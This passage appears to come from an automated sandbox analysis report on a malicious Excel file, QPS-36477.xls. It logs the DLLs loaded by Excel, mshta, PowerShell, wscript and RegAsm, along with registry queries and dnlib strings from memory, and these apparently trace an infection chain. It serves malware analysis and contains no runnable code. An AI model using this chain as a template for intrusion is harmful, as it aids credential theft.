                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                    Source: QPS-36477.xlsStatic file information: File size 1094656 > 1048576
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
